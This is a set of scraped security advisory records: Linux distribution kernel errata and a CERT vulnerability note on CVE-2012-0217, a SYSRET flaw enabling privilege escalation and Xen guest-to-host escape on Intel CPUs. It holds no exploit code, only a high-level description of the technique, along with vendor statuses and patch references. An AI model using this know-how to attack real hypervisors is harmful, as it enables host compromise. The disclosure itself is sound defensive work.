The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-June/030716.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0721.html", "edition": 3, "modified": "2012-06-13T00:11:19", "published": "2012-06-13T00:11:19", "href": "http://lists.centos.org/pipermail/centos-announce/2012-June/030716.html", "id": "CESA-2012:0721", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. 
In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T11:50:07", "published": "2012-06-12T04:00:00", "id": "RHSA-2012:0721", "href": "https://access.redhat.com/errata/RHSA-2012:0721", "type": "redhat", "title": "(RHSA-2012:0721) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL 
pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup 
dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 5, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721-1", "href": "http://linux.oracle.com/errata/ELSA-2012-0721-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in 
dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 4, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721", "href": "http://linux.oracle.com/errata/ELSA-2012-0721.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] 
use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 
9972346]\n[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] {CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. 
Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 5, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061-1", "href": "http://linux.oracle.com/errata/ELSA-2012-1061-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] {CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. 
Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 4, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061", "href": "http://linux.oracle.com/errata/ELSA-2012-1061.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-0744", "CVE-2012-0217", "CVE-2012-0218"], "description": "### Overview \n\nSome 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape.\n\nIntel claims that this vulnerability is a software implementation issue, as their processors are functioning as per their documented specifications. However, software that fails to take the Intel-specific SYSRET behavior into account may be vulnerable.\n\n### Description \n\nA [ring3 attacker](<http://en.wikipedia.org/wiki/Ring_3>) may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP). The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. 
\n \n**Details from Xen** \n \n[_CVE-2012-0217 / XSA-7 - 64-bit PV guest privilege escalation vulnerability_](<http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>) \n \n_A vulnerability which can allow a 64-bit PV guest kernel running on a 64-bit hypervisor to escalate privileges to that of the host by arranging for a system call to return via sysret to a non-canonical RIP. Intel CPUs deliver the resulting exception in an undesirable processor state._ \n \n**Details from FreeBSD** \n \n[_FreeBSD-SA-12:04.sysret:__ __Privilege escalation when returning from kernel_](<http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>) \n \n_FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash._ \n \n**Details from Microsoft** \n \n[_User Mode Scheduler Memory Corruption Vulnerability - __MS12-042 - Important_](<http://technet.microsoft.com/en-us/security/bulletin/MS12-042>) \n \n_An elevation of privilege vulnerability exists in the way that the Windows User Mode Scheduler handles system requests. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights._ \n \n_Mitigating Factors for User Mode Scheduler Memory Corruption Vulnerability_ \n \n_Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation: _\n\n * _An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. 
The vulnerability could not be exploited remotely or by anonymous users._\n * _This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2._\n * _Systems with AMD or ARM-based CPUs are not affected by this vulnerability._\n \n**Details from Red Hat** \n \n[_RHSA-2012:0720-1_](<https://rhn.redhat.com/errata/RHSA-2012-0720.html>)_ & _[_RHSA-2012:0721-1_](<https://rhn.redhat.com/errata/RHSA-2012-0721.html>)_: __It was found that the Xen hypervisor implementation as shipped with Red Hat Enterprise Linux 5 did not properly restrict the syscall return addresses in the sysret return path to canonical addresses. An unprivileged user in a 64-bit para-virtualized guest, that is running on a 64-bit host that has an Intel CPU, could use this flaw to crash the host or, potentially, escalate their privileges, allowing them to execute arbitrary code at the hypervisor level. (CVE-2012-0217, Important)_ \n \nDetails from some affected vendors were not available at the time of publication. \n--- \n \n### Impact \n\nA local authenticated attacker may exploit this vulnerability for operating system privilege escalation or for a guest-to-host virtual machine escape. \n \n--- \n \n### Solution \n\n**Apply an Update** \nPlease review the Vendor Information section of this document for vendor-specific patch and workaround details. \n \n--- \n \n### Vendor Information\n\n649219\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix __ Affected\n\nUpdated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA number of security vulnerabilities have been identified in Citrix XenServer. 
These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including version 6.0.2.\n\nThe following issues have been addressed: \n \n\u2022 64-bit PV guest to host privilege escalation vulnerability. This issue only impacts servers running on Intel processors and could permit a 64-bit PV guest to compromise the XenServer host (CVE-2012-0217). \n \n\u2022 Guest denial of service on syscall/sysenter exception generation. This issue could permit user code within a PV guest to crash the guest operating system (CVE-2012-0218). \n \n\u2022 Administrative connections to VM consoles through XAPI or XenCenter could be routed to the wrong VM.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.citrix.com/article/CTX133161>\n\n### FreeBSD Project Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n\n### Intel Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 13, 2012 \n\n**Statement Date: June 13, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis is a software implementation issue. Intel processors are functioning as per specifications and this behavior is correctly documented in the Intel(R) 64 Software Developers Manual, Volume 2B Pages 4-598-599.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Joyent __ Affected\n\nUpdated: June 14, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have an illumos-derived system, SmartOS -- it (and every other illumos derivative) was affected by this vulnerability. 
illumos issue: <https://www.illumos.org/issues/2873>\n\nPatch is in hg changeset: 13724:7740792727e0. This can also be found on the github bridge: <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1> \n \nJoyent's cloud customers are unaffected. Joyent's SmartDataCenter customers will be receiving an updated platform, versioned joyent_20120614T001014Z.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.illumos.org/issues/2873>\n * <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1>\n\n### Microsoft Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis security update resolves one privately reported vulnerability and one publicly disclosed vulnerability in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that exploits the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. 
The vulnerability could not be exploited remotely or by anonymous users.\n\n### Vendor References\n\n * <https://technet.microsoft.com/en-us/security/bulletin/MS12-042>\n\n### NetBSD Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 11, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <https://access.redhat.com/security/cve/CVE-2012-0217>\n * <https://rhn.redhat.com/errata/RHSA-2012-0720.html>\n * <https://rhn.redhat.com/errata/RHSA-2012-0721.html>\n\n### SUSE Linux Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n**Statement Date: May 02, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2012-0217.html>\n\n### Xen Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information 
regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n\n### AMD Not Affected\n\nUpdated: June 13, 2012 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSystems using AMD CPUs are not vulnerable to this privilege escalation. AMD have issued the following statement:\n\n \n_AMD processors' SYSRET behavior is such that a non-canonical address in RCX does not generate a #GP while in CPL0. We have verified this with our architecture team, with our design team, and have performed tests that verified this on silicon. Therefore, this privilege escalation exposure is not applicable to any AMD processor._ \nThis statement comes from the Xen security advisory. \n\n### Apple Inc. Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 15, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Not Affected\n\nUpdated: June 25, 2012 \n\n**Statement Date: June 25, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: June 08, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe VMware Security Response Center has reviewed the technical details of CVE-2012-0217, the \"#GP in sysret\" vulnerability. The \"sysret\" instruction is not used in VMware hypervisor code, therefore VMware products are not affected by this issue. 
Please note that guest operating systems that are installed as virtual machines may be affected and should be patched based on the recommendation of their respective OS vendors.\n\nFor further questions on this or any security vulnerability, please contact the VSRC at security@vmware.com.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Parallels Holdings Ltd Unknown\n\nNotified: May 21, 2012 Updated: May 21, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.6 | AV:L/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 5.5 | E:F/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://en.wikipedia.org/wiki/Ring_3>\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n * <http://blog.xen.org/index.php/2012/06/13/the-intel-sysret-privilege-escalation/>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n * <http://blog.gmane.org/gmane.linux.kernel.commits.2-4/month=20060401>\n * <http://lists.xen.org/archives/html/xen-devel/2012-06/msg01072.html>\n * <http://www.vupen.com/blog/20120904.Advanced_Exploitation_of_Xen_Sysret_VM_Escape_CVE-2012-0217.php>\n\n### Acknowledgements\n\nThanks to Rafal Wojtczuk of Bromium, Inc. 
